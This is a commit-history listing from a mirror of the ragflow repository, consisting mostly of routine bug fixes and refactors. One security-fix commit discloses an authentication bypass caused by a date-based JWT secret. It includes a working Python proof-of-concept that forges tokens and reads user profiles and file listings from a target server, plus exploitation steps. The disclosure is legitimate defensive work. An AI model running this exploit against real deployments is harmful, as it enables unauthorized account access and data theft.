ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2025-12-07 04:21:30 +00:00

Author	SHA1	Message	Date
Jin Hai	4a2ff633e0	Fix typo in code (#8327 ) ### What problem does this PR solve? Fix typo in code ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-06-18 09:41:09 +08:00
Liu An	0a13d79b94	Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318 ) ### What problem does this PR solve? - Replace hardcoded 255-byte file name length checks with FILE_NAME_LEN_LIMIT constant - Update error messages to show the actual limit value - #8290 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-17 18:01:30 +08:00
Liu An	64e281b398	Fix: Add validation for empty filenames in document_app.py (#8321 ) ### What problem does this PR solve? - Add validation for empty filenames in document_app.py and trim whitespace ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-17 15:53:41 +08:00
Liu An	a3bebeb599	Fix: Enforce 255-byte filename limit (#8290 ) ### What problem does this PR solve? - Add filename length validation (<=255 bytes) for document upload/rename in both HTTP and SDK APIs - Update error messages for consistency - Fix comparison operator in SDK from '>=' to '>' for filename length check ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-16 16:39:41 +08:00
Yongteng Lei	0fa1a1469e	Fix: avoid mixing different embedding models in document parsing (#8260 ) ### What problem does this PR solve? Fix mixing different embedding models in document parsing. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-16 13:40:12 +08:00
Kevin Hu	f7074037ef	Feat: Let number of task ahead be visible. (#8259 ) ### What problem does this PR solve? ![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-13 17:32:40 +08:00
Yongteng Lei	b2eed8fed1	Fix: incorrect progress updating (#8253 ) ### What problem does this PR solve? Progress is only updated if it's valid and not regressive. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-13 17:24:14 +08:00
Liu An	99725444f1	Fix: desc parameter parsing (#8229 ) ### What problem does this PR solve? - Fix boolean parsing for 'desc' parameter in kb_app.py to properly handle string values ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:47 +08:00
Stephen Hu	1ab0f52832	Fix：The OpenAI-Compatible Agent API returns an incorrect message (#8177 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8175 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:15 +08:00
Kevin Hu	d36c8d18b1	Refa: make exception more clear. (#8224 ) ### What problem does this PR solve? #8156 ### Type of change - [x] Refactoring	2025-06-12 17:53:59 +08:00
Liu An	7fbbc9650d	Fix: Move pagerank field from create to update dataset API (#8217 ) ### What problem does this PR solve? - Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq - Add pagerank update logic in dataset update endpoint - Update API documentation to reflect changes - Modify related test cases and SDK references #8208 This change makes pagerank a mutable property that can only be set after dataset creation, and only when using elasticsearch as the doc engine. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:49 +08:00
Liu An	d0c5ff04a6	Fix: Add pagerank validation for non-elasticsearch doc engines (#8215 ) ### What problem does this PR solve? Validate that pagerank updates are only allowed when using elasticsearch as the document engine. Return an error if pagerank is set while using a different doc engine, preventing potential inconsistencies in document scoring. #8208 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:22 +08:00
Liu An	cef587abc2	Fix: Add validation for dataset name in KB update API (#8194 ) ### What problem does this PR solve? Validate dataset name in knowledge base update endpoint to ensure: - Name is a non-empty string - Name length doesn't exceed DATASET_NAME_LIMIT - Whitespace is trimmed before processing Prevents invalid dataset names from being saved and provides clear error messages. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 11:37:25 +08:00
Liu An	60c1bf5a19	Fix: duplicate knowledgebase name validation logic (#8199 ) ### What problem does this PR solve? Change the condition from checking for >1 to >=1 when validating duplicate knowledgebase names to properly catch all duplicates. This ensures no two knowledgebases can have the same name for a tenant. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 09:46:57 +08:00
Liu An	e87ad8126c	Fix: Improve dataset name validation in KB app (#8188 ) ### What problem does this PR solve? - Trim whitespace before checking for empty dataset names - Change length check from >= to > DATASET_NAME_LIMIT for consistency ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-11 16:14:29 +08:00
Stephen Hu	e6f68e1ccf	Fix: When List Kbs some times the total is wrong (#8151 ) ### What problem does this PR solve? for kb.app list method when owner_ids the total calculate is wrong (now will base on the paged result to calculate total) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 11:34:30 +08:00
yurhett	9c6c6c51e0	Fix: use jwks_uri from OIDC metadata for JWKS client (#8136 ) ### What problem does this PR solve? Issue: #8051 The current implementation assumes JWKS endpoints follow the standard `/.well-known/jwks.json` convention. This breaks authentication for OIDC providers that use non-standard JWKS paths, resulting in 404 errors during token validation. Root Cause Analysis - The OpenID Connect specification doesn't mandate a fixed path for JWKS endpoints - Some identity providers (like certain Keycloak configurations) use custom endpoints - Our previous approach constructed JWKS URLs by convention rather than discovery ### Solution Approach Instead of constructing JWKS URLs by appending to the issuer URI, we now: 1. Properly leverage the `jwks_uri` from the OIDC discovery metadata 2. Honor the identity provider's actual configured endpoint ```python # Before (fragile approach) jwks_url = f"{self.issuer}/.well-known/jwks.json" # After (standards-compliant) jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 10:16:58 +08:00
Liu An	968ffc7ef3	Refa: dataset operations to simplify error handling (#8132 ) ### What problem does this PR solve? - Consolidate database operations within single try-except blocks in the methods ### Type of change - [x] Refactoring	2025-06-09 13:29:56 +08:00
Liu An	92625e1ca9	Fix: document typo in test (#8091 ) ### What problem does this PR solve? fix document typo in test ### Type of change - [x] Typo	2025-06-05 19:03:46 +08:00
Stephen Hu	6953ae89c4	Fix:when stream=false，new message without sessionid does no (#8078 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8070 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 15:14:15 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in a assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Liu An	8b7c424617	Fix: Document.update() now refreshes object data (#8068 ) ### What problem does this PR solve? #8067 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:46:29 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
Stephen Hu	f819378fb0	Update api_utils.py (#8069 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8059#issuecomment-2942407486 lazy throw exception to better support custom embedding model ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:05:58 +08:00
Liu An	ab5e3ded68	Fix: DataSet.update() now refreshes object data (#8058 ) ### What problem does this PR solve? #8057 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 09:26:19 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Stephen Hu	b832372c98	Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037 ) ### What problem does this PR solve? Close #8033 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 10:18:14 +08:00
Kevin Hu	b6f1cd7809	Fix: no kb selected for an assistant. (#8021 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 17:42:16 +08:00
Liu An	e64da8b2aa	Fix: sdk can not update chat model (#8016 ) ### What problem does this PR solve? #7791 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 15:22:26 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
CharlesHsu	241fdf266a	Fix: Prevent Flask hot reload from hanging due to early thread startup (#7966 ) Fix: Prevent Flask hot reload from hanging due to early thread startup ### What problem does this PR solve? When running the Flask server with `use_reloader=True` (enabled during debug mode), modifying a Python source file would trigger a reload detection (`Detected change in ...`), but the application would hang instead of restarting cleanly. This was caused by the `update_progress` background thread being started too early, often within the main module scope. This issue was reported in [#7498](https://github.com/infiniflow/ragflow/issues/7498). ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --- Summary of changes: - Wrapped `update_progress` launch in a `threading.Timer` with delay to avoid premature thread execution. - Marked thread as `daemon=True` to avoid blocking process exit. - Added `WERKZEUG_RUN_MAIN` environment check to ensure background threads only run in the reloader child process (the actual Flask app). - Retained original behavior in production mode (`debug=False`). --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-05-30 13:38:30 +08:00
Stephen Hu	62611809e0	Fix: Add user_id when create Conversation (#7960 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7940 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 13:11:41 +08:00
dong	62de535ac8	Fix Bug: When performing the dify_retrieval, the metadata of the document was empty. (#7968 ) ### What problem does this PR solve? When performing the dify_retrieval, the metadata of the document was empty. ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:58:05 +08:00
Qidi Cao	f0879563d0	fix: resolve residual image files issue after document deletion (#7964 ) ### What problem does this PR solve? When deleting knowledge base documents in RAGFlow, the current process only removes the block texts in Elasticsearch and the original files in MinIO, but it leaves behind many binary images and thumbnails generated during chunking. This pull request improves the deletion process by querying the block information in Elasticsearch to ensure a more thorough and complete cleanup. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:56:33 +08:00
Stephen Hu	a31ad7f960	Fix: File selection in Retrieval testing causes other options to disappear (#7759 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7753 The internal is due to when the selected row keys change will trigger a testing, but I do not know why. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 09:38:50 +08:00
天海蒼灆	f584f5c3d0	agents openai API add new way to get session_id (#7937 ) ### What problem does this PR solve? SpringAI can only add session_id in metadata。so add new way to get session_id from "id" or "metadata.id" ![image](https://github.com/user-attachments/assets/0c698ebb-2228-46d8-94c5-2a291b6f70bf) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 13:31:17 +08:00
Yongteng Lei	0c562f0a9f	Refa: change citation mark as [ID:n] (#7923 ) ### What problem does this PR solve? Change citation mark as [ID:n], it's easier for LLMs to follow the instruction :) #7904 ### Type of change - [x] Refactoring	2025-05-29 10:03:51 +08:00
Yongteng Lei	b95747be4c	Fix: early return when update doc in sdk (#7907 ) ### What problem does this PR solve? Fix early return when update doc. #7886 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-28 19:20:27 +08:00
sinopec	243ed4bc35	Feat: Surpport dynamically add knowledge basees for retrieval while u… (#7915 ) …sing the SDK chat API ### What problem does this PR solve? When using the SDK for chat, you can include the IDs of additional knowledge bases you want to use in the request. This way, you don’t need to repeatedly create new assistants to support various combinations of knowledge bases. This is especially useful when there are many knowledge bases with different content. If users clearly know which knowledge base contains the information they need and select accordingly, the recall accuracy will be greatly improved. Users only need to add an extra field, a kb_ids array, in the HTTP request. The content of this field can be determined by the client fetching the list of knowledge bases and letting the user select from it. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Li Ye <liye@unittec.com>	2025-05-28 19:16:16 +08:00
Qidi Cao	4d835b7303	fix: resolve “has no attribute 'max_length'” error in keyword_extraction (#7903 ) ### What problem does this PR solve? Issue Description: When using the `/api/retrieval` endpoint with a POST request and setting the `keyword` parameter to `true`, the system invokes the `model_instance` method from `TenantLLMService` to create a `chat_mdl` instance. Subsequently, it calls the `keyword_extraction` method to extract keywords. However, within the `keyword_extraction` method, the `chat` function of the LLM attempts to access the `chat_mdl.max_length` attribute to validate input length. This results in the following error: ``` AttributeError: 'SILICONFLOWChat' object has no attribute 'max_length' ``` Proposed Solution: Upon reviewing other parts of the codebase where `chat_mdl` instances are created, it appears that utilizing `LLMBundle` for instantiation is more appropriate. `LLMBundle` includes the `max_length` attribute, which should resolve the encountered error. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-05-28 10:58:06 +08:00
liu an	ff0e82988f	Fix: patch regex vulnerability in filename handling (#7887 ) ### What problem does this PR solve? [Regular Expression Injection leading to Denial of Service (ReDoS)](https://github.com/infiniflow/ragflow/security/advisories/GHSA-wqq6-x8g9-f7mh) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-27 16:35:37 +08:00
Kevin Hu	1f32e6e4f4	Fix: list out of boundary (#7843 ) ### What problem does this PR solve? Close #7837 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-26 10:28:36 +08:00
Hao Zhang	2f4d803db1	Delete Corresponding Minio Bucket When Deleting a Knowledge Base (#7841 ) ### What problem does this PR solve? Delete Corresponding Minio Bucket When Deleting a Knowledge Base [issue #4113 ](https://github.com/infiniflow/ragflow/issues/4113) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality)	2025-05-26 10:02:51 +08:00
Yongteng Lei	453287b06b	Feat: more robust fallbacks for citations (#7801 ) ### What problem does this PR solve? Add more robust fallbacks for citations ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality)	2025-05-23 18:24:55 +08:00
liu an	e166f132b3	Feat: change default models (#7777 ) ### What problem does this PR solve? change default models to buildin models https://github.com/infiniflow/ragflow/issues/7774 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-23 18:21:25 +08:00
Yongteng Lei	42f4d4dbc8	Fix: wrong type hint (#7738 ) ### What problem does this PR solve? Wrong hint type. #7729. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-23 18:21:06 +08:00
liu an	fed1221302	Refa: HTTP API list datasets / test cases / docs (#7720 ) ### What problem does this PR solve? This PR introduces Pydantic-based validation for the list datasets HTTP API, improving code clarity and robustness. Key changes include: Pydantic Validation Error Handling Test Updates Documentation Updates ### Type of change - [x] Documentation Update - [x] Refactoring	2025-05-20 09:58:26 +08:00
Chaoxi Weng	6ed81d6774	Feat: Add OAuth `state` parameter for CSRF protection (#7709 ) ### What problem does this PR solve? Add OAuth `state` parameter for CSRF protection: - Updated `get_authorization_url()` to accept an optional state parameter - Generated a unique state value during OAuth login and stored in session - Verified state parameter in callback to ensure request legitimacy This PR follows OAuth 2.0 security best practices by ensuring that the authorization request originates from the same user who initiated the flow. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-20 09:40:31 +08:00
donblack01	115850945e	Fix:When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data (#7325 ) ### What problem does this PR solve? Fix:When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data' Fix:Fixed the issue where the new knowledge base would not be renamed when there was a knowledge base with the same name ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: tangyu <1@1.com> Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-05-20 09:39:26 +08:00
Yongteng Lei	e8e2a95165	Refa: more fallbacks for bad citation format (#7710 ) ### What problem does this PR solve? More fallbacks for bad citation format ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] Refactoring	2025-05-19 19:34:05 +08:00

1 2 3 4 5 ...

869 Commits